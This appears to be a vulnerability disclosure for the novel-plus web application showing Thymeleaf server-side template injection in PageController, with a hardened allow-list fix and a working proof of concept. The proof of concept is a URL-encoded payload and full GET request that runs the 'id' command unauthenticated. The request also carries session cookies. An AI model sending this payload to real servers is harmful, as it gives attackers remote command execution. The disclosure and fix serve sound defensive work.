GSBP
Version: <= 4.4.0
https://github.com/201206030/novel-plus
Vulnerable files:
novel-plus/novel-front/src/main/java/com/java2nb/novel/controller/page/PageController.java
novel-plus/novel-crawl/src/main/java/com/java2nb/novel/controller/page/PageController.java
Several handlers in PageController take the path segments of the request and concatenate them directly into the string they return, and Spring MVC uses that return value as the Thymeleaf view name. The Thymeleaf version bundled with the project is old enough that a view name containing a fragment expression (template :: selector) is parsed as an expression, including __${...}__ preprocessing. An attacker therefore controls a template expression evaluated on the server: server-side template injection (SSTI), which gives arbitrary code execution and operating-system command execution.
    // Excerpt of the vulnerable handlers from PageController (novel-front and novel-crawl).
    // The string each handler returns is resolved by Spring MVC as the Thymeleaf view name,
    // so every path variable ends up inside a template name without any validation.
    // getUserDetails(), authorService and UserDetails come from the surrounding class and
    // the project's own packages and are not shown here.
    package com.java2nb.novel.controller.page;

    import javax.servlet.http.HttpServletRequest;
    import org.springframework.web.bind.annotation.PathVariable;
    import org.springframework.web.bind.annotation.RequestMapping;

    // One segment: /<url>.html  ->  view name "<url>"
    @RequestMapping("{url}.html")
    public String module(@PathVariable("url") String url) {
        return url;
    }

    // Two segments: /<module>/<url>.html  ->  view name "<module>/<url>"
    @RequestMapping("{module}/{url}.html")
    public String module2(@PathVariable("module") String module, @PathVariable("url") String url,
                          HttpServletRequest request) {
        if (request.getRequestURI().startsWith("/author")) {
            // Author area
            UserDetails user = getUserDetails(request);
            if (user == null) {
                // Not logged in
                return "redirect:/user/login.html?originUrl=" + request.getRequestURI();
            }
            boolean isAuthor = authorService.isAuthor(user.getId());
            if (!isAuthor) {
                return "redirect:/author/register.html";
            }
        }
        // Only the /author prefix is checked; every other module is reachable unauthenticated.
        return module + "/" + url;
    }

    // Three segments: /<module>/<classify>/<url>.html  ->  view name "<module>/<classify>/<url>"
    @RequestMapping("{module}/{classify}/{url}.html")
    public String module3(@PathVariable("module") String module, @PathVariable("classify") String classify,
                          @PathVariable("url") String url) {
        return module + "/" + classify + "/" + url;
    }
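As an added example (not the project's own code, and not its upstream fix), here is a hardened variant of the same three handlers that checks every path segment against a strict allow-list before it is turned into a view name. It assumes Spring Boot 2.x (javax.servlet) with Spring MVC's Thymeleaf view resolution; the class name HardenedPageController, the SAFE_SEGMENT pattern and the helper names isSafeSegment/requireSafe are my own. The author-area login check from module2 is left as a comment because it depends on project classes not shown above.

```java
package com.java2nb.novel.controller.page;

import java.util.regex.Pattern;

import javax.servlet.http.HttpServletRequest;

import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.server.ResponseStatusException;

/**
 * Added example, not novel-plus code: the three page routes with each path segment
 * validated before it becomes part of a Thymeleaf view name.
 */
@Controller
public class HardenedPageController {

    // A view-name segment may contain letters, digits, '_' or '-' and nothing else.
    // That excludes '$', '{', '}', ':', '.', '/' and whitespace, so neither Thymeleaf
    // preprocessing (__${...}__) nor a fragment expression (template :: selector)
    // can be smuggled into the name that Spring hands to the template engine.
    static final Pattern SAFE_SEGMENT = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    static boolean isSafeSegment(String segment) {
        return segment != null && SAFE_SEGMENT.matcher(segment).matches();
    }

    // Fail with a plain 404; never echo the rejected segment into any template or message.
    static String requireSafe(String segment) {
        if (!isSafeSegment(segment)) {
            throw new ResponseStatusException(HttpStatus.NOT_FOUND);
        }
        return segment;
    }

    @RequestMapping("{url}.html")
    public String module(@PathVariable("url") String url) {
        return requireSafe(url);
    }

    @RequestMapping("{module}/{url}.html")
    public String module2(@PathVariable("module") String module, @PathVariable("url") String url,
                          HttpServletRequest request) {
        // Validate before any other logic so no later branch can see an unchecked segment.
        String safeModule = requireSafe(module);
        String safeUrl = requireSafe(url);
        // if (request.getRequestURI().startsWith("/author")) { ... login / isAuthor check as in the original ... }
        return safeModule + "/" + safeUrl;
    }

    @RequestMapping("{module}/{classify}/{url}.html")
    public String module3(@PathVariable("module") String module, @PathVariable("classify") String classify,
                          @PathVariable("url") String url) {
        return requireSafe(module) + "/" + requireSafe(classify) + "/" + requireSafe(url);
    }

    // Self-check of the allow-list that runs without starting Spring: the published
    // payload (decoded form) must be rejected and ordinary page names accepted.
    public static void main(String[] args) {
        String payload = "__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(\"id\")"
                + ".getInputStream()).next()}__::.x";
        if (isSafeSegment(payload)) {
            throw new AssertionError("SSTI payload was accepted");
        }
        if (!isSafeSegment("index") || !isSafeSegment("book_list-2")) {
            throw new AssertionError("ordinary page name was rejected");
        }
        if (isSafeSegment("a::b") || isSafeSegment("../index") || isSafeSegment("")) {
            throw new AssertionError("separator or empty segment was accepted");
        }
        System.out.println("allow-list check OK");
    }
}
```

Allow-listing the characters is deliberately preferred over blacklisting `__`, `${` or `::`: Thymeleaf accepts several expression syntaxes (`${...}`, `*{...}`, `#{...}`, `@{...}`, `~{...}`), so a denylist is easy to get wrong. The more robust fix is to stop deriving view names from the URL at all and map each page to an explicit handler or to a fixed lookup table of template names.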
The vulnerability can be confirmed with a single unauthenticated GET to the one-segment route (module()). Request the following URL-encoded path:
%5f%5f%24%7b%6e%65%77%20%6a%61%76%61%2e%75%74%69%6c%2e%53%63%61%6e%6e%65%72%28%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%64%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2e%6e%65%78%74%28%29%7d%5f%5f%3a%3a%2e%78.html
This is the URL encoding of __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x.html. The path variable url becomes __${...}__::.x, which is returned as the view name; the "::" makes Thymeleaf parse it as a fragment expression, and the __...__ preprocessing evaluates the ${...} part, running Runtime.exec("id") and splicing the first token of its output into the template name.
The output of the executed command, uid=501(gsbp), appears in the response body.
Here is my request packet:
GET /%5f%5f%24%7b%6e%65%77%20%6a%61%76%61%2e%75%74%69%6c%2e%53%63%61%6e%6e%65%72%28%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%64%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2e%6e%65%78%74%28%29%7d%5f%5f%3a%3a%2e%78.html HTTP/1.1
Host: 127.0.0.1:8088
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: OFBiz.Visitor=10000; PUBLICCMS_ANALYTICS_ID=eb392c29-86ae-4291-9f9a-3adaaf621c88; PUBLICCMS_USER=2_d7d6c8b8-6750-447e-bf8e-475294b6cb03; PUBLICCMS_ADMIN=1_6f4b4818-1f3e-41b5-8027-1627cb68d2a8; JSESSIONID=321a6ce2-fc9a-4dc7-a1bb-b8355b345975; userClientMarkKey=409cb988808a48349c409a02fab9890d; Hm_lvt_ecc8b50a3122e6d5e09be7a9e5383e07=1738348967; Hm_lpvt_ecc8b50a3122e6d5e09be7a9e5383e07=1738348967; HMACCOUNT=683131F95E4EB9B9
Connection: keep-alive
The one-segment route (module) and the three-segment route (module3) perform no authentication at all, and module2 only checks for a login under the /author prefix, so the payload works as an unauthenticated single GET request. The result is unauthenticated remote command execution, which makes this vulnerability severe.